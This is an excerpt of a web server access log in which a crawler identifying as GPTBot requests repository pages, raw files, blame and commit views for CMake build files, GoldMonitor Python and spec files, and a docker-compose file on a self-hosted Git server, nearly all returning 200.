Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 144] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/query" -[17/Feb/2026:16:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 10264] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" -[17/Feb/2026:16:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.3.spec" [Client 74.7.227.38] [Length 25845] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" -[17/Feb/2026:16:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v4.9.spec" [Client 74.7.227.38] [Length 25729] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" -[17/Feb/2026:16:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v3.8.spec" [Client 74.7.227.38] [Length 25907] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" -[17/Feb/2026:16:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v4.8.spec" [Client 74.7.227.38] [Length 25747] [Gzip 4.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" -[17/Feb/2026:16:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V4.8.py" [Client 74.7.227.38] [Length 32399] [Gzip 6.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V4.8.py" -[17/Feb/2026:16:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.1.py" [Client 74.7.227.38] [Length 35871] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.1.py" -[17/Feb/2026:16:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.3.py" [Client 74.7.227.38] [Length 36319] [Gzip 7.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.py" -[17/Feb/2026:16:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.2.py" [Client 74.7.227.38] [Length 35747] [Gzip 7.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.py" -[17/Feb/2026:16:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_V5.2.spec" [Client 74.7.227.38] [Length 25819] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.2.spec" -[17/Feb/2026:16:40:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_v4.7.spec" [Client 74.7.227.38] [Length 25796] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" -[17/Feb/2026:16:40:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 474022] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:40:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 491998] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:40:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 492036] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:16:40:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 492790] [Gzip 19.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:40:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 492822] [Gzip 19.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 474054] [Gzip 19.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:16:40:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 492829] [Gzip 19.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:16:40:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12841] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/docker-compose.yml" -[17/Feb/2026:16:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:40:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 5722] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 9886] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:16:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 9886] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:16:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 9921] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:16:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 9886] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:16:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:16:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:16:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 819487] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:16:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:16:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 749901] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:16:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 749876] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:16:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 722321] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:16:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 749435] [Gzip 27.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:16:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 749403] [Gzip 27.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:16:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 722294] [Gzip 27.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:16:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 749908] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:16:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 788394] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:16:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 788394] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:16:41:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:16:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 819487] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:16:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 819599] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:16:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 819487] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:16:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 819599] [Gzip -] [Sent-to 192.168.0.250] 